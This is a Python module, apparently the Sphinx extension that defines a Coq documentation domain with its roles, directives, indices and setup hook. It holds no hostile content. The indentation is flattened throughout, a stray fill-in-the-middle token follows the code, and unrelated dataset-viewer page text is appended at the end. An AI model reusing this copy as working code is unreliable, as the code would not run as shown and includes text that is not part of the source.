innernodeclass = nodes.inline
warn_dangling = True
def process_link(self, env, refnode, has_explicit_title, title, target):
if not has_explicit_title:
index = CoqDomain.find_index_by_name(target)
if index:
title = index.localname
return title, target
class StdGlossaryIndex(Index):
name, localname, shortname = "glossindex", "Glossary", "terms"
def generate(self, docnames=None):
content = defaultdict(list)
for ((type, itemname), (docname, anchor)) in self.domain.data['objects'].items():
if type == 'term':
entries = content[itemname[0].lower()]
entries.append([itemname, 0, docname, anchor, '', '', ''])
content = sorted(content.items())
return content, False
def GrammarProductionRole(typ, rawtext, text, lineno, inliner, options={}, content=[]):
"""A grammar production not included in a ``prodn`` directive.
Useful to informally introduce a production, as part of running text.
Example::
:production:`string` indicates a quoted string.
You're not likely to use this role very commonly; instead, use a ``prodn``
directive and reference its tokens using ``:token:`…```.
"""
#pylint: disable=dangerous-default-value, unused-argument
env = inliner.document.settings.env
targetid = nodes.make_id('grammar-token-{}'.format(text))
target = nodes.target('', '', ids=[targetid])
inliner.document.note_explicit_target(target)
code = nodes.literal(rawtext, text, role=typ.lower())
node = nodes.inline(rawtext, '', target, code, classes=['inline-grammar-production'])
set_role_source_info(inliner, lineno, node)
env.domaindata['std']['objects']['token', text] = env.docname, targetid
return [node], []
GrammarProductionRole.role_name = "production"
def GlossaryDefRole(typ, rawtext, text, lineno, inliner, options={}, content=[]):
"""Marks the definition of a glossary term inline in the text. Matching :term:`XXX`
constructs will link to it. Use the form :gdef:`text <term>` to display "text"
for the definition of "term", such as when "term" must be capitalized or plural
for grammatical reasons. The term will also appear in the Glossary Index.
Examples::
A :gdef:`prime` number is divisible only by itself and 1.
:gdef:`Composite <composite>` numbers are the non-prime numbers.
"""
#pylint: disable=dangerous-default-value, unused-argument
env = inliner.document.settings.env
std = env.domaindata['std']['objects']
m = ReferenceRole.explicit_title_re.match(text)
if m:
(text, term) = m.groups()
text = text.strip()
else:
term = text
key = ('term', term)
if key in std:
MSG = 'Duplicate object: {}; other is at {}'
msg = MSG.format(term, env.doc2path(std[key][0]))
inliner.document.reporter.warning(msg, line=lineno)
targetid = nodes.make_id('term-{}'.format(term))
std[key] = (env.docname, targetid)
target = nodes.target('', '', ids=[targetid], names=[term])
inliner.document.note_explicit_target(target)
node = nodes.inline(rawtext, '', target, nodes.Text(text), classes=['term-defn'])
set_role_source_info(inliner, lineno, node)
return [node], []
GlossaryDefRole.role_name = "gdef"
class CoqDomain(Domain):
"""A domain to document Coq code.
Sphinx has a notion of “domains”, used to tailor it to a specific language.
Domains mostly consist in descriptions of the objects that we wish to
describe (for Coq, this includes tactics, tactic notations, options,
exceptions, etc.), as well as domain-specific roles and directives.
Each domain is responsible for tracking its objects, and resolving
references to them. In the case of Coq, this leads us to define Coq
“subdomains”, which classify objects into categories in which names must be
unique. For example, a tactic and a theorem may share a name, but two
tactics cannot be named the same.
"""
name = 'coq'
label = 'Coq'
object_types = {
# ObjType (= directive type) → (Local name, *xref-roles)
'cmd': ObjType('cmd', 'cmd'),
'cmdv': ObjType('cmdv', 'cmd'),
'tacn': ObjType('tacn', 'tacn'),
'tacv': ObjType('tacv', 'tacn'),
'opt': ObjType('opt', 'opt'),
'flag': ObjType('flag', 'flag'),
'table': ObjType('table', 'table'),
'attr': ObjType('attr', 'attr'),
'thm': ObjType('thm', 'thm'),
'prodn': ObjType('prodn', 'prodn'),
'exn': ObjType('exn', 'exn'),
'warn': ObjType('warn', 'exn'),
'index': ObjType('index', 'index', searchprio=-1)
}
directives = {
# Note that some directives live in the same semantic subdomain; ie
# there's one directive per object type, but some object types map to
# the same role.
'cmd': VernacObject,
'cmdv': VernacVariantObject,
'tacn': TacticObject,
'tacv': TacticVariantObject,
'opt': OptionObject,
'flag': FlagObject,
'table': TableObject,
'attr': AttributeObject,
'thm': GallinaObject,
'prodn' : ProductionObject,
'exn': ExceptionObject,
'warn': WarningObject,
}
roles = {
# Each of these roles lives in a different semantic “subdomain”
'cmd': XRefRole(warn_dangling=True),
'tacn': XRefRole(warn_dangling=True),
'opt': XRefRole(warn_dangling=True),
'flag': XRefRole(warn_dangling=True),
'table': XRefRole(warn_dangling=True),
'attr': XRefRole(warn_dangling=True),
'thm': XRefRole(warn_dangling=True),
'prodn' : XRefRole(warn_dangling=True),
'exn': XRefRole(warn_dangling=True),
'warn': XRefRole(warn_dangling=True),
# This one is special
'index': IndexXRefRole(),
# These are used for highlighting
'n': NotationRole,
'g': CoqCodeRole
}
indices = [CoqVernacIndex, CoqTacticIndex, CoqOptionIndex, CoqGallinaIndex, CoqExceptionIndex, CoqAttributeIndex]
data_version = 1
initial_data = {
# Collect everything under a key that we control, since Sphinx adds
# others, such as “version”
'objects' : { # subdomain → name → docname, objtype, targetid
'cmd': {},
'tacn': {},
'opt': {},
'flag': {},
'table': {},
'attr': {},
'thm': {},
'prodn' : {},
'exn': {},
'warn': {},
}
}
@staticmethod
def find_index_by_name(targetid):
for index in CoqDomain.indices:
if index.name == targetid:
return index
return None
def get_objects(self):
# Used for searching and object inventories (intersphinx)
for _, objects in self.data['objects'].items():
for name, (docname, objtype, targetid) in objects.items():
yield (name, name, objtype, docname, targetid, self.object_types[objtype].attrs['searchprio'])
for index in self.indices:
yield (index.name, index.localname, 'index', "coq-" + index.name, '', -1)
def merge_domaindata(self, docnames, otherdata):
DUP = "Duplicate declaration: '{}' also defined in '{}'.\n"
for subdomain, their_objects in otherdata['objects'].items():
our_objects = self.data['objects'][subdomain]
for name, (docname, objtype, targetid) in their_objects.items():
if docname in docnames:
if name in our_objects:
self.env.warn(docname, DUP.format(name, our_objects[name][0]))
our_objects[name] = (docname, objtype, targetid)
def resolve_xref(self, env, fromdocname, builder, role, targetname, node, contnode):
# ‘target’ is the name that was written in the document
# ‘role’ is where this xref comes from; it's exactly one of our subdomains
if role == 'index':
index = CoqDomain.find_index_by_name(targetname)
if index:
return make_refnode(builder, fromdocname, "coq-" + index.name, '', contnode, index.localname)
else:
resolved = self.data['objects'][role].get(targetname)
if resolved:
(todocname, _, targetid) = resolved
return make_refnode(builder, fromdocname, todocname, targetid, contnode, targetname)
return None
def clear_doc(self, docname_to_clear):
for subdomain_objects in self.data['objects'].values():
for name, (docname, _, _) in list(subdomain_objects.items()):
if docname == docname_to_clear:
del subdomain_objects[name]
def is_coqtop_or_coqdoc_block(node):
return (isinstance(node, nodes.Element) and
('coqtop' in node['classes'] or 'coqdoc' in node['classes']))
def simplify_source_code_blocks_for_latex(app, doctree, fromdocname): # pylint: disable=unused-argument
"""Simplify coqdoc and coqtop blocks.
In HTML mode, this does nothing; in other formats, such as LaTeX, it
replaces coqdoc and coqtop blocks by plain text sources, which will use
pygments if available. This prevents the LaTeX builder from getting
confused.
"""
is_html = app.builder.tags.has("html")
for node in doctree.traverse(is_coqtop_or_coqdoc_block):
if is_html:
node.rawsource = '' # Prevent pygments from kicking in
elif 'coqtop-hidden' in node['classes']:
node.parent.remove(node)
else:
node.replace_self(nodes.literal_block(node.rawsource, node.rawsource, language="Coq"))
COQ_ADDITIONAL_DIRECTIVES = [CoqtopDirective,
CoqdocDirective,
ExampleDirective,
InferenceDirective,
PreambleDirective]
COQ_ADDITIONAL_ROLES = [GrammarProductionRole,
GlossaryDefRole]
def setup(app):
"""Register the Coq domain"""
# A few sanity checks:
subdomains = set(obj.subdomain for obj in CoqDomain.directives.values())
found = set (obj for obj in chain(*(idx.subdomains for idx in CoqDomain.indices)))
assert subdomains.issuperset(found), "Missing subdomains: {}".format(found.difference(subdomains))
assert subdomains.issubset(CoqDomain.roles.keys()), \
"Missing from CoqDomain.roles: {}".format(subdomains.difference(CoqDomain.roles.keys()))
# Add domain, directives, and roles
app.add_domain(CoqDomain)
app.add_index_to_domain('std', StdGlossaryIndex)
for role in COQ_ADDITIONAL_ROLES:
app.add_role(role.role_name, role)
for directive in COQ_ADDITIONAL_DIRECTIVES:
app.add_directive(directive.directive_name, directive)
app.add_transform(CoqtopBlocksTransform)
app.connect('doctree-resolved', simplify_source_code_blocks_for_latex)
app.connect('doctree-resolved', CoqtopBlocksTransform.merge_consecutive_coqtop_blocks)
# Add extra styles
app.add_css_file("ansi.css")
app.add_css_file("coqdoc.css")
app.add_js_file("notations.js")
app.add_css_file("notations.css")
app.add_css_file("pre-text.css")
# Tell Sphinx about extra settings
app.add_config_value("report_undocumented_coq_objects", None, 'env')
# ``env_version`` is used by Sphinx to know when to invalidate
# coqdomain-specific bits in its caches. It should be incremented when the
# contents of ``env.domaindata['coq']`` change. See
# `https://github.com/sphinx-doc/sphinx/issues/4460`.
meta = { "version": "0.1",
"env_version": 2,
"parallel_read_safe": True }
return meta<|fim▁end|> |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.